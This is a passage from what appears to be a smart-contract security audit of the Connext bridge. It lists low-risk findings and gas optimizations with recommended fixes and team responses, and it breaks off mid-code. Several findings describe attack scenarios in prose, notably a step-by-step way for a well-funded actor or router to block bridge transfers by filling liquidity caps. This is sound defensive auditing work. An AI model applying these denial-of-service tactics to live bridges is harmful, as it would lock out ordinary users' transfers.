swap pools used in Connext are incompatible with tokens with varying decimals Severity: Low Risk Context: • TokenFacet.sol#L164 • TokenFacet.sol#L399 • SwapAdminFacet.sol#L140 • SwapAdminFacet.sol#L143 • SwapAdminFacet.sol#L169 • StableSwap.sol#L100 • SwapUtilsExternal.sol#L407 • SwapUtils.sol#L370 Description: The stable swap functionality used in Connext calculates and stores for each token in a pool, the token's precision relative to the pool's precision. The token precision calculation uses the token's decimals. And since this precision is only set once, for a token that can have its decimals changed at a later time in the future, the precision used might not be always accurate in the future. And so in the event of a token decimal change, the swap calculations involving this token would be inaccurate. For exmpale in _xp(...): function _xp(uint256[] memory balances, uint256[] memory precisionMultipliers) internal pure returns (uint256[] memory) uint256 numTokens = balances.length; require(numTokens == precisionMultipliers.length, "mismatch multipliers"); uint256[] memory xp = new uint256[]numTokens; for (uint256 i; i < numTokens; ) { xp[i] = balances[i] * precisionMultipliers[i]; unchecked { ++i; } } return xp; { } We are multiplying in xp[i] = balances[i] * precisionMultipliers[i]; and cannot use division for tokens that have higher precision than the pool's default precision. Recommendation: Document the procedure of what tokens are allowed to be included in stable swap pools and what actions would Connext take when a decimal change happens. Leave a comment for users/devs whether only fixed decimal tokens are allowed or not in the protocol. Connext: The intention with the current construction is to manually update assets whose decimals change (by removing them and setting them up again) Added a comment for devs in PR 2453. Spearbit: This issue needs off-chain monitoring and enforcement. The Connext team would need to monitor all tokens used in the protocol for this issue. 47 +5.3.32 When Connext reaches the cap allowed custodied, race conditions can be created Severity: Low Risk Context: • BridgeFacet.sol#L489-L497 • RoutersFacet.sol#L554-L561 Description: When IERC20(local).balanceOf(address(this)) is close to s.caps[key] (this can be relative/subjective) for a canonical token on its canonical domain, a race condition gets created where users might try to frontrun each others calls to xcall or xcallIntoLocal to be included in a cross chain transfer. This race condition is actually between all users and all liquidity routers. Since there is a same type of check when routers try to add liquidity. uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } Recommendation: Connext team would need to monitor the custodied amount for each allowed asset and adjust the caps accordingly before such race conditions are created. Connext: Doesn't fix this core race issue between users, but at the very least we can document the issue and provide resources for making sure there's plenty of liquidity headroom for a user's transfer. Spearbit: Acknowledged. +5.3.33 Prevent sequencers from signing multiple routes for the same cross-chain transfer Severity: Low Risk Context: BridgeFacet.sol#L622 Description: Liquidity routers only sign the hash of (transferId, pathLength) combo. This means that each router does not have a say in: 1. The ordering of routers provided/signed by the sequencer. 2. What other routers are used in the sequence. If a sequencer signs 2 different routes (set of routers) for a cross-chain transfer, a relayer can decide which set of routers to use and provide to BridgeFacet.execute to make sure the liquidity from a specific set of routers' balances is used (also the same possibility if 2 different sequencers sign 2 different routes for a cross-chain transfer). Recommendation: The implementation of the sequencer or a set of sequencers should prevent signing a transfer with a different set of routers. Also, it would be great to document how the on/off-chain bidding of routers/sequencers work. Are approved routers/sequencers contracts/EOAs or a mix? Connext: A check for this is implemented offchain, but doing this in an onchain-verifiable way is out of scope for this iteration of the network. Spearbit: Acknowledged. 48 +5.3.34 Well-funded malicious actors can DOS the bridge Severity: Low Risk Context: BridgeFacet.sol#L28 Description: A malicious actor (e.g. a well-funded cross-chain messaging competitor) can DOS the bridge cheaply. Assume Ethereum <-> Polygon bridge and the liquidity cap is set to 1m for USDC. 1. Using a slow transfer to avoid router liquidity fees, Bob (attacker) transferred 1m USDC from Ethereum to Polygon. 1m USDC will be locked on Connext's Bridge. Since the liquidity cap for USDC is filled, no one will be able to transfer any USDC from Ethereum to Polygon unless someone transfers POS-USDC from Polygon to Ethereum to reduce the amount of USDC held by the bridge. 2. On the destination chain, nextUSDC (local bridge asset) will be swapped to POS-USDC (adopted asset). The swap will incur low slippage because it is a stablewap. Assume that Bob will receive 999,900 POS-USDC back on Polygon. A few hundred or thousand loss is probably nothing for a determined competitor that wants to harm the reputation of Connext. 3. Bob bridged back the 999,900 POS-USDC using Polygon's Native POS bridge. Bob will receive 999,900 USDC in his wallet in Ethereum after 30 minutes. It is a 1-1 exchange using a native bridge, so no loss is incurred here. 4. Whenever the liquidity cap for USDC gets reduced on Connext's Bridge, Bob will repeat the same trick to keep the bridge in an locked state. 5. If Bob is well-funded enough, he could perform this against all Connext's bridges linked to other chains for popular assets (e.g. USDC), and normal users will have issues transferring popular assets when using xcall. Recommendation: Consider implementing off-chain components that automatically rebalance the assets by de- ploying them elsewhere if a certain asset on the bridge is reaching the liquidity cap. However, this might need to be done carefully, otherwise, some tokens cannot bridge back. Alternatively, prepare a continuity plan to deal with this issue manually (e.g. methods for reducing the liquidity on the bridge) if it happens. Connext: Introducing transfers to rebalance the network is something we are familiar with how to do manually, as it is a requirement of our current system as well so that is the approach we will take. These conditions are introduced by the nature of a cap, but limiting the amount at stake while the protocol is new is higher priority to us. Spearbit: Acknowledged. +5.3.35 calculateTokenAmount is not checking whether amounts provided has the same length as balances Severity: Low Risk Context: • SwapUtils.sol#L636-L645 • StableSwap.sol#L280 • StableSwapFacet.sol#L167 Description: There is no check to make sure amounts.length == balances.length in calculateTokenAmount: function calculateTokenAmount( Swap storage self, uint256[] calldata amounts, bool deposit ) internal view returns (uint256) { uint256 a = _getAPrecise(self); uint256[] memory balances = self.balances; ... There are 2 bad cases: 49 1. amounts.length > balances.length, in this case, we have provided extra data which will be ignored silently and might cause miscalculation on or off chain. 2. amounts.length < balances.length, the loop in calculateTokenAmount would/should revert becasue of an index-out-of-bound error. In this case, we might spend more gas than necessary compared to if we had performed the check and reverted early. Recommendation: Check for amounts.length == balances.length and thus avoid the pitfalls mentioned above. function calculateTokenAmount( Swap storage self, uint256[] calldata amounts, bool deposit ) internal view returns (uint256) { uint256[] memory balances = self.balances; uint256 numBalances = balances.length; if(amounts.length != numBalances) { revert SomeCustomError(); // <-- this error needs to be defined } ... Connext: Solved in PR 2388. Spearbit: Verified. +5.3.36 Rearrange an expression in _calculateSwapInv to avoid underflows Severity: Low Risk Context: SwapUtils.sol#L581 Description: In the following expression used in SwapUtils_calculateSwapInv, if xp[tokenIndexFrom] = x + 1 the expression would underflow and revert. We can arrange the expression to avoid reverting in this edge case. dx = x - xp[tokenIndexFrom] + 1; Recommendation: If the following rearrangement is used, the edge case discussed would not revert. dx = (x + 1) - xp[tokenIndexFrom]; Note: We need to check whether the ranges of asset balances can be high such that x+1 would overflow. Connext: Solved in PR 2382. Spearbit: Verified. +5.3.37 The pre-image of DIAMOND_STORAGE_POSITION's storage slot is known Severity: Low Risk Context: LibDiamond.sol#L14 Description: The preimage of the hashed storage slot DIAMOND_STORAGE_POSITION is known. Recommendation: It might be best to subtract 1 so that the preimage would not be easily attainable. As an example, this is the technique that OpenZeppelin uses. Connext: Solved by PR 2224. Spearbit: Verified. 50 +5.3.38 The @param NatSpec comment for _key in AssetLogic._swapAsset is incorrect Severity: Low Risk Context: AssetLogic.sol#L221 Description: The @param NatSpec for _key indicates that this parameter is a canonical token id where instead it should mention that it is a hash of a canonical id and its corresponding domain. We need to make sure the correct value has been passed down to _swapAsset. Recommendation: Change the NatSpec to: - * @param _key - The canonical token id + * @param _key - Hash of a canonical id and its corresponding domain Connext: Solved in PR 2457. Spearbit: Verified. +5.3.39 Malicious routers can temporarily DOS the bridge by depositing a large amount of liquidity Severity: Low Risk Context: BridgeFacet.sol#L489-L497 Description: Both router and bridge share the same liquidity cap on the Connext bridge. Assume that the liquidity cap for USDC is 1 million on Ethereum. Shortly after the Connext Amarok launch, a router adds 1 million USDC liquidity. No one would be able to perform a xcall transfer with USDC from Ethereum to other chains as it will always revert because the liquidity cap has exceeded. The DOS is temporary because the router's liquidity on Ethereum will be reduced if there is USDC liquidity flowing in the opposite direction (e.g., From Polygon to Ethereum) Recommendation: Consider having a separate liquidity cap for the router and bridge. Connext: The routers were removed from tracking towards the cap. The cap will track funds moving through the bridge, and that will impact AMM prices, which will impact slippage, which should naturally tamp demand for routers to provide mainnet exit liquidity. Since capping only value through the bridge seems to have network-wide impacts, we decided to only count those funds towards the cap. Spearbit: Verified. +5.3.40 Prevent deploying a representation token twice Severity: Low Risk Context: TokenFacet.sol#L164-L190, TokenFacet.sol#L272-L313, TokenFacet.sol#L354-L383 Description: The function setupAsset() is protected by _enrollAdoptedAndLocalAssets() which checks s.approvedAssets[_key] to prevent accidentally setting up an asset twice. However the function _removeAssetId() is rather thorough and removes the s.approvedAssets[_key] flag. After a call to _removeAssetId(), an asset can be recreated via setupAsset(). This will deploy a second representation token which will be confusing to users of Connext. Note: The function setupAssetWithDeployedRepresentation() could be used to connect a previous presentation token again to the canonical token. Note: All these functions are authorized so it would only be a problem if mistakes are made. 51 function setupAsset(...) ... onlyOwnerOrAdmin ... { if (_canonical.domain != s.domain) { _local = _deployRepresentation(...); // deploys a new token } else { ... } bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _local, _stableSwapPool, _canonical); ... } function _enrollAdoptedAndLocalAssets(...) ... { ... if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); s.approvedAssets[_key] = true; ... } function _removeAssetId(...) ... { ... delete s.approvedAssets[_key]; ... } Recommendation: Consider checking that a token has previously been deployed. Probably a separate mapping is required to store previously deployed contracts. Connext: Solved in PR 2462. The following still works after removing the token: • getLocalAsset / _getLocalAsset / _getRepresentationAsset because it would be important to allow the stored value to be retrieved, regardless of the allowlist status. If we do delist an asset, this not working would make things a bit more complicated. • execute / _handleExecuteLiquidity / _creditTokens because otherwise you run into a position where a user could have started a transfer, and the asset is removed. imagine you are transferring between two re- mote domains, using the slow path. in this case, while the transfer is in flight the IBridgeToken.totalSupply could be 0 on the destination, allowing the asset to be removed. when the transfer arrives to be reconciled, it would not be able to as it would no longer be able to use the _creditTokens or execute code paths. • repayAavePortal because if the asset is removed, using repayAavePortalFor (which uses the adopted asset flow) would fail, and routers have to be able to pay down portal debt. Spearbit: Verified. +5.3.41 Extra safety checks in _removeAssetId() Severity: Low Risk Context: TokenFacet.sol#L354-L383 Description: The function _removeAssetId() deletes assets but it doesn't check if the passed parameters are a consistent set. This allows for mistakes where the wrong values are accidentally deleted. function _removeAssetId(bytes32 _key, address _adoptedAssetId, address _representation) internal { ... delete s.adoptedToCanonical[_adoptedAssetId]; delete s.representationToCanonical[_representation]; ... } Recommendation: Consider adding the following checks in the beginning of function _removeAssetId(): if (s.adoptedToCanonical[_adoptedAssetId] != key) revert .... if (s.representationToCanonical[_representation] != key) revert ... 52 Connext: Solved in PR 2454. Spearbit: Verified. +5.3.42 Data length not validated Severity: Low Risk Context: GnosisSpokeConnector.sol#L54-L61, BaseMultichain.sol#L39-L47, OptimismSpokeConnector.sol#L51- L54 Description: The following functions do not validate that the input _data is 32 bytes. • GnosisSpokeConnector._sendMessag • GnosisSpokeConnector._processMessage • BaseMultichain.sendMessage • OptimismSpokeConnector._sendMessage The input _data contains the outbound Merkle root or aggregated Merkle root, which is always 32 bytes. If the root is not 32 bytes, it is invalid and should be rejected. Recommendation: Validate the input _data to ensure that it is 32 bytes. GnosisSpokeConnector._sendMessag function _sendMessage(bytes memory _data) internal override { + require(_data.length == 32, "!length"); // send the message to the l1 connector by calling `processMessage` GnosisAmb(AMB).requireToPassMessage( mirrorConnector, abi.encodeWithSelector(Connector.processMessage.selector, _data), mirrorGas ); } function _processMessage(bytes memory _data) internal override { + require(_data.length == 32, "!length"); // ensure the l1 connector sent the message require(_verifySender(mirrorConnector), "!mirrorConnector"); // ensure it is headed to this domain require(GnosisAmb(AMB).destinationChainId() == block.chainid, "!destinationChain"); // update the aggregate root on the domain receiveAggregateRoot(bytes32(_data)); } BaseMultichain.sendMessage function _sendMessage(address _amb, bytes memory _data) internal { + require(_data.length == 32, "!length"); Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable _data, address(0), // fallback address on origin chain MIRROR_CHAIN_ID, 0 // fee paid on origin chain ); } OptimismSpokeConnector._sendMessage 53 function _sendMessage(bytes memory _data) internal override { + require(_data.length == 32, "!length"); bytes memory _calldata = abi.encodeWithSelector(Connector.processMessage.selector, _data); OptimismAmb(AMB).sendMessage(mirrorConnector, _calldata, uint32(mirrorGas)); } Connext: Solved in PR 2452. Spearbit: Verified. +5.3.43 Verify timestamp reliability on L2 Severity: Low Risk Context: StableSwap.sol#L136, ProposedOwnableFacet.sol, RoutersFacet.sol#L442, StableSwapFacet.sol#L46, SwapUtilsExternal.sol, ProposedOwnableFacet.sol#L263, AmplificationUtils.sol, Description: Timestamp information on rollups can be less reliable than on mainnet. For instance, Arbitrum docs say: As a general rule, any timing assumptions a contract makes about block numbers and timestamps should be considered generally reliable in the longer term (i.e., on the order of at least several hours) but unreliable in the shorter term (minutes). (It so happens these are generally the same assumptions one should operate under when using block numbers directly on Ethereum!) Uniswap docs mention this for Optimism: The block.timestamp of these blocks, however, reflect the block.timestamp of the last L1 block ingested by the Sequencer. Recommendation: Before deploying on a rollup, consider checking their documentation on timestamp and check if the time dependent functionality is is safe. It can be the case that the deviation is small enough to not matter. Increase the deadline threshold, if the deviation is high enough. Connext: Acknowledged. Spearbit: Acknowledged. +5.3.44 MirrorConnector cannot be changed once set Severity: Low Risk Context: PolygonHubConnector.sol#L51-L55 PolygonSpokeConnector.sol#L78-L82 Description: For chains other than Polygon, it is allowed to change mirror connector any number of times. For Polygon chain, the _setMirrorConnector is overridden. 1. Let's take PolygonHubConnector contract example: function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxChildTunnel(_mirrorConnector); } 2. Since setFxChildTunnel(PolygonHubConnector) can only be called once due to below require check, this also restricts the number of time mirror connector can be altered. function setFxChildTunnel(address _fxChildTunnel) public virtual { require(fxChildTunnel == address(0x0), "FxBaseRootTunnel: CHILD_TUNNEL_ALREADY_SET"); ... } 54 Recommendation: If it is required to allow changing of Mirror connector then remove the require condition in both setFxChildTunnel(PolygonHubConnector) and setFxRootTunnel(PolygonSpokeConnector) Connext: Fixed in pull 2546 & 2520. Spearbit: Verified. +5.3.45 Possible infinite loop in dequeueVerified() Severity: Low Risk Context: Queue.sol#L59-L102 Description: The loop in function dequeueVerified() doesn't end if queue.first == queue.last == 0. In this situation, at unchecked { --last; } the following happens: last wraps to type(uint128).max. Now last is very large and is surely >=first and thus the loop keeps running. This problem can occur when queue isn't initialized. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { uint128 first = queue.first; uint128 last = queue.last; require(last >= first, "queue empty"); for (last; last >= first; ) { ... unchecked { --last; } // underflows when last == 0 (e.g. queue isn't initialized) } } Recommendation: Document the risk of an infinite loop and the importance of initializing queue. Or do one of the following: • Check queue is initialized (e.g. queue.first >= 1 as last >= first is already checked). • Remove unchecked. • Change the type of last to a signed type : int256, this way it is no problem if its negative. Connext: Solved in PR 2384. Spearbit: Verified. +5.3.46 Do not ignore staticcall's return value Severity: Low Risk TypedMemView.sol#L652, Context: TypedMemView.sol#L761, Description: TypedMemView calls several precompiles through staticcall opcode and never checks its return value assuming it is a success. For instance: TypedMemView.sol#L668-L669, TypedMemView.sol#L685-L686, // use the identity precompile to copy // guaranteed not to fail, so pop the success pop(staticcall(gas(), 4, _oldLoc, _len, _newLoc, _len)) However, there are rare cases when call to precompiles can fail. For example, when the call runs out of gas (since 63/64 of the gas is passed, the remaining execution can still have gas). Generally, not checking for success of calls is dangerous and can have unintended consequences. Recommendation: staticcall returns 1 on success and 0 on failure. Consider reverting if it returns 0. See summa-tx/memview-sol/pull/9 for a solution. Connext: Solved in PR 2451. 55 Spearbit: Verified. +5.3.47 Renounce wait time can be extended Severity: Low Risk Context: ProposedOwnable.sol#L109-L118 Description: The _proposedOwnershipTimestamp updates everytime on calling proposeNewOwner with newlyPro- posed as zero address. This elongates the time when owner can be renounced. Recommendation: Add a check which rejects duplicate owner renounce request. if (_proposed == newlyProposed && newlyProposed == address(0) && _proposedOwnershipTimestamp!=0){ revert ProposedOwnable__proposeNewOwner_invalidProposal(); } Connext: Solved in PR 2450. Spearbit: Verified. +5.3.48 Extra parameter in function checker() at encodeWithSelector() Severity: Low Risk Context: SendOutboundRootResolver.sol#L32-L42 Description: The function checker() sets up the parameters to call the function sendMessage(). However, it adds an extra parameter outboundRoot, which isn't necessary. function sendMessage() external { ... } function checker() external view override returns (bool canExec, bytes memory execPayload) { ... execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); // extra parameter ... } Recommendation: Remove outboundRoot and preferably use abi.encodeCall(...) which explicitly checks the provided parameters with the function definition. - execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); + execPayload = abi.encodeCall(this.sendMessage, ()); Connext: SendOutboundRootResolver.sol is removed in PR 2199. Spearbit: Verified. 56 5.4 Gas Optimization +5.4.1 MerkleLib.insert() can be optimized Severity: Gas Optimization Context: Merkle.sol#L76-L105, Merkle.sol#L115 MerkleTreeManager.insert() calls MerkleLib.insert() repeatedly on tree stored in Description: storage. Each call to MerkleLib.insert() reads the entire tree from storage, and writes 2 (tree.count and tree.branch[i]) back to storage. These storage operations can be done only once at the beginning, by loading them in memory. The updated count and branches can be written back to the storage at the end saving expensive SSTORE and SLOAD operations. Recommendation: Consider the following: • Load the entire tree in memory at the beginning in MerkleTreeManager.insert(). Pass this memory tree to MerkleLib.insert(). • MerkleLib.insert() now takes tree in memory. • At the end of the function, it writes the updated tree back to storage. Note that if size of the leaves array is much smaller than TREE_DEPTH == 32, there's a chance this increases the gas consumption since now there is an additional cost of memory expansion, and 33 slots are always written regardless of the size of the leaves array. Connext: Solved in PR 2211. Spearbit: Verified. +5.4.2 EIP712 domain separator can be cached Severity: Gas Optimization Context: OZERC20.sol#L386 Description: The domain separator can be cached for gas-optimization. Recommendation: Consider caching the EIP712 domain separator. Following is the caching mechanism from the latest OpenZeppelin implementation for reference. /** * @dev Returns the domain separator for the current chain. */ function _domainSeparatorV4() internal view returns (bytes32) { if (address(this) == _CACHED_THIS && block.chainid == _CACHED_CHAIN_ID) { return _CACHED_DOMAIN_SEPARATOR; } else { return _buildDomainSeparator(_TYPE_HASH, _HASHED_NAME, _HASHED_VERSION); } } Connext: Solved in PR 2350. Spearbit: Verified. 57 +5.4.3 stateCommitmentChain can be made immutable Severity: Gas Optimization Context: OptimismHubConnector.sol#L25 Description: Once assigned in constructor, stateCommitmentChain cannot be changed. Recommendation: stateCommitmentChain variable can be defined as immutable Connext: Solved in PR 2480. Spearbit: Verified. +5.4.4 Nonce can be updated in single step Severity: Gas Optimization Context: SpokeConnector.sol#L278-L279 Description: Nonce can be incremented in single step instead of using a second step which will save some gas Recommendation: Kindly change the below lines: function dispatch( uint32 _destinationDomain, bytes32 _recipientAddress, bytes memory _messageBody ) external onlyWhitelistedSender returns (bytes32) { ... - uint32 _nonce = nonces[_destinationDomain]; - nonces[_destinationDomain] = _nonce + 1; + uint32 _nonce = nonces[_destinationDomain]++; ... } Connext: Solved in PR 2479. Spearbit: Verified. +5.4.5 ZkSyncSpokeConnector._sendMessage encodes unnecessary data Severity: Gas Optimization Context: • ZkSyncSpokeConnector.sol#L50-L54 • ZkSyncHubConnector.sol#L88 Description: Augmenting the _data with the processMessage function selector is unnecessary. Since on the mirror domain, we just need to provide the right parameters to ZkSyncHubConnector.processMessageFromRoot (which by the way anyone can call) to prove the L2 message inclusion of the merkle root _data. Thus the current implementation is wasting gas. Recommendation: We can rewrite ZkSyncSpokeConnector._sendMessage function as: function _sendMessage(bytes memory _data) internal override { // Dispatch message through zkSync AMB L1_MESSENGER_CONTRACT.sendToL1(_data); } Also ZkSyncHubConnector.processMessageFromRoot would need to be changed accordingly and TypedMemView library import can be removed from ZkSyncHubConnector: 58 function processMessageFromRoot( // zkSync block number in which the message was sent uint32 _l2BlockNumber, // Message index, that can be received via API uint256 _l2MessageIndex, // The L2 transaction number in a block, in which the log was sent uint16 _l2TxNumberInBlock, // The message that was sent from l2 bytes calldata _message, // Merkle proof for the message bytes32[] calldata _proof ) external { // sanity check root length (fn selector + 32 bytes root) require(_message.length == 32, "!length"); IZkSync zksync = IZkSync(AMB); L2Message memory message = L2Message({ txNumberInBlock: _l2TxNumberInBlock, sender: mirrorConnector, data: _message }); bool success = zksync.proveL2MessageInclusion(_l2BlockNumber, _l2MessageIndex, message, _proof); require(success, "!proven"); bytes32 _root = bytes32(_message); // NOTE: there are no guarantees the messages are processed once, so processed roots // must be tracked within the connector. See: // https://v2-docs.zksync.io/dev/developer-guides/Bridging/l2-l1.html#prove-inclusion-of-the-message- ,! into-the-l2-block if (!processed[_root]) { // set root to processed processed[_root] = true; // update the root on the root manager IRootManager(ROOT_MANAGER).aggregate(MIRROR_DOMAIN, _root); } // otherwise root was already sent to root manager } Reference: Summary on L2->L1 messaging Connext: Solved in PR 2505. Spearbit: Verified. c +5.4.6 getD can be optimized by removing an extra multiplication by d per iteration Severity: Gas Optimization Context: • SwapUtils.sol#L327-L341 • SwapUtilsExternal.sol#L364-L378 Description: The calculation for the new d can be simplified by canceling a d from the numerator and denominator. Basically, we have : f (D) = 1 nn+1a Q xi Dn+1 + (1 (cid:0) 1 na )D (cid:0) X xi 59 and having/assuming n, a, xi are fixed, we are using Newton's method to find a solution for f = 0. The original implementation is using: D0 = D (cid:0) f (D) f 0(D) = which can be simplified to: (na P xi + Dn+1 nn(cid:0)1 Q xi )D (na (cid:0) 1)D + (n + 1) Dn+1 nn Q xi na P xi + D0 = Dn nn(cid:0)1 (na (cid:0) 1) + (n + 1) D Q xi Dn Q xi nn Recommendation: Lines 327-L341 can be changed to: uint256 dP = 1; for (uint256 j; j < numTokens; ) { dP = (dP * d) / (xp[j] * numTokens); // If we were to protect the division loss we would have to keep the denominator separate // and divide at the end. However this leads to overflow with large numTokens or/and D. // dP = dP * D * D * D * ... overflow! unchecked { ++j; } } prevD = d; d = ((nA * s) / AmplificationUtils.A_PRECISION + dP * numTokens * d) / ((nA - AmplificationUtils.A_PRECISION) / AmplificationUtils.A_PRECISION + (numTokens + 1) * dP); This simplification breaks some test cases: 60 Failing tests: Encountered 9 failing tests in contracts_forge/core/connext/facets/StableSwapFacet.t.sol:StableSwapFacetTest ,! [FAIL. Reason: Assertion failed.] test_StableSwapFacet__addSwapLiquidity_shouldWork() (gas: 208089) [FAIL. Reason: Call did not revert as expected] test_StableSwapFacet__removeSwapLiquidityImbalance_failIfFrontRun() (gas: 382845) ,! [FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityImbalance_failIfMoreThanLpBalance() (gas: 229659) ,! [FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityImbalance_failIfPaused() (gas: 245027) ,! [FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityImbalance_shouldWork() (gas: 292194) ,! [FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityOneToken_failIfFrontRun() (gas: 390378) ,! [FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityOneToken_failIfMoreThanLpBalance() (gas: 225984) ,! [FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidityOneToken_shouldWork() (gas: 278690) ,! [FAIL. Reason: Assertion failed.] test_StableSwapFacet__removeSwapLiquidity_shouldWork() (gas: 248608) Encountered 3 failing tests in contracts_forge/core/connext/facets/SwapAdminFacet.t.sol:SwapAdminFacetTest ,! [FAIL. Reason: Assertion failed.] test_SwapAdminFacet__rampA_shouldWorkWithDownwards() (gas: 269074) [FAIL. Reason: Assertion failed.] test_SwapAdminFacet__rampA_shouldWorkWithUpwards() (gas: 269057) [FAIL. Reason: Assertion failed.] ,! test_SwapAdminFacet__withdrawSwapAdminFess_shouldWorkWithExpectedAmount() (gas: 241254) Encountered a total of 12 failing tests, 521 tests succeeded Looking at the tests, it seems like some hardcoded constants have been used, like the following: SwapAdmin- Facet.t.sol#L604 Where do these constants come from? Also, if this recommendation is taken into consideration, we would suggest adding fuzzing and differential tests for getD. Connext: These constants come from saddle finance unit tests. Changing the code would break the tests and new constants have to be found to fix the test. We would rather keep the current code to stay as close to the Saddle original as possible. Spearbit: Acknowledged. +5.4.7 _recordOutputAsSpent in ArbitrumHubConnector can be optimized by changing the require condition Severity: Gas Optimization Context: ArbitrumHubConnector.sol#L178 Description: In _recordOutputAsSpent, _index is compared with a literal value that is a power of 2. The expo- nentiation in this statement can be completely removed to save gas. Recommendation: Rewrite the require statement as: require((_index >>_proof.length) == 0, "!minimal proof"); Gas saved according to test cases: 61 test_ArbitrumHubConnector__processMessageFromRoot_failsIfNot36Bytes() (gas: -215 (-0.059%)) test_ArbitrumHubConnector__processMessageFromRoot_works() (gas: -215 (-0.099%)) test_ArbitrumHubConnector__processMessageFromRoot_failsIfIncorrectProof() (gas: -215 (-0.121%)) test_ArbitrumHubConnector__processMessageFromRoot_failsIfProofNotMinimal() (gas: -215 (-0.122%)) test_ArbitrumHubConnector__processMessageFromRoot_failsIfAlreadyProcessed() (gas: -430 (-0.186%)) Overall gas change: -1290 (-0.587%) A similiar recommendation should apply if this require statement is converted to a custom error pattern. Connext: Solved in PR 2509. Spearbit: Verified. +5.4.8 Message.leaf's memory manipulation is redundant Severity: Gas Optimization Context: Message.sol#L97-L107 Description: The chunk of memory related to _message is dissected into pieces and then copied into another section of memory and hashed. Recommendation: We can save gas if we hashed the original section. function leaf(bytes29 _message) internal pure returns (bytes32 hash) { uint256 loc = _message.loc(); uint256 len = _message.len(); assembly { hash := keccak256(loc, len) } } Gas saved according to test cases: test_MultichainSpokeConnector_processMessage_revertIfWrongDataLength(uint8) (gas: -163 (-0.419%)) Overall gas change: -163 (-0.419%) Connext: Solved in PR 2484. Spearbit: Verified. +5.4.9 coerceBytes32 can be more optimized Severity: Gas Optimization Context: TypeCasts.sol#L10-L12 Description: It would be cheaper to not use TypedMemView in coerceBytes32(). We would only need to check the length and mask. Note: coerceBytes32 doesn't seem to be used. If that is the case it could also be removed. Recommendation: As a rough sketch we could have: 62 error TheStringIsToLongForBytes32(); uint256 internal constant INT256_MIN = 1 << 255; function coerceBytes32(string memory _s) internal pure returns (bytes32 result) { bytes memory b = bytes(_s); uint256 length = b.length; if(length == 0) { return bytes32(0); } if(length > 32) { revert TheStringIsToLongForBytes32(); } assembly { // solhint-disable-previous-line no-inline-assembly let mask := sar(sub(shl(3, length), 1), INT256_MIN) // 2^(255) - 2^(255 - (8*(len) - 1)) result:= and(mload(add(b, 0x20)), mask) // clean-up possible dirty bytes } } Connext: Removed function in PR 2502. Spearbit: Verified. +5.4.10 Consider removing domains from propagate() arguments Severity: Gas Optimization Context: RootManager.sol#L147 Description: propagate(uint32[] calldata _domains, address[] calldata _connectors) only uses _do- mains to verify its hash against domainsHash, and to emit an event. Hence, its only use seems to be to notify off-chain agents of the supported domains. Recommendation: Consider removing _domains from propagate()'s arguments. To still notify the off-chain agents about the supported domains, consider adding events to DomainIndexer's addDomain() and removeDo- main() function. Connext: Fixed in commit 4c5821 and PR 2547. Spearbit: Verified. +5.4.11 Loop counter can be made uint256 to save gas Severity: Gas Optimization Context: SwapAdminFacet.sol#L132, StableSwap.sol#L90, Encoding.sol#L22-L45, TypedMemView.sol#L158 Description: There are several loops that use an uint8 as the type for the loop variable. Changing that to uint256 can save some gas. Recommendation: Consider replacing uint8 with uint256 in loops. Connext: Solved in PR 2372. Spearbit: Verified. 63 +5.4.12 Set owner directly to zero address in renounceOwnership Severity: Gas Optimization Context: ProposedOwnable.sol#L135 ProposedOwnableFacet.sol#L234 Description: 1. In renounceOwnership function, _proposed will always be address zero so instead of setting the variable _proposed as owner, we can directly set address(0) as the new owner. 2. Similarly for renounceOwnership function also set address(0) as the new owner. Recommendation: Revise the renounceOwnership function function renounceOwnership() public virtual onlyOwner { ... // Emit event, set new owner, reset timestamp _setOwner(address(0)); } Connext: Solved in PR 2482. Spearbit: Verified. +5.4.13 Retrieve decimals() once Severity: Gas Optimization Context: BridgeFacet.sol#L6, BridgeFacet.sol#L514-L516, AssetLogic.sol#L5 Description: There are several locations where the number of decimals() of tokens are retrieved. As all tokens are whitelisted, it would also be possible to retrieve the decimals() once and store these to save gas. BridgeFacet.sol import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; ... function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... ,! } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... } Recommendation: Consider to retrieve the decimals() of tokens once and store these. Connext: Solved in PR 2530. Spearbit: Verified. 64 +5.4.14 The root... function in Merkle.sol can be optimized by using YUL, unrolling loops and using the scratch space Severity: Gas Optimization Context: • Merkle.sol#L111 • Merkle.sol#L122 Description: We can use assembly, unroll loops, and use the scratch space to save gas. Also, rootWithCtx can be removed (would save us from jumping) since it has only been used here. Recommendation: library MerkleLib { ... /** * @notice Calculates and returns tree's current root. * @return _current bytes32 root. **/ function root(Tree storage tree) internal view returns (bytes32 _current) { uint256 _index = tree.count; if(_index == 0) { return Z_32; } uint256 i; assembly { let TREE_SLOT := tree.slot for {} true {} { for {} true {} { if and(_index, 1) { mstore(0, sload(TREE_SLOT)) mstore(0x20, Z_0) _current := keccak256(0, 0x40) break } if and(_index, shl(1, 1)) { mstore(0, sload(add(TREE_SLOT, 1))) mstore(0x20, Z_1) _current := keccak256(0, 0x40) i := 1 break } if and(_index, shl(2, 1)) { mstore(0, 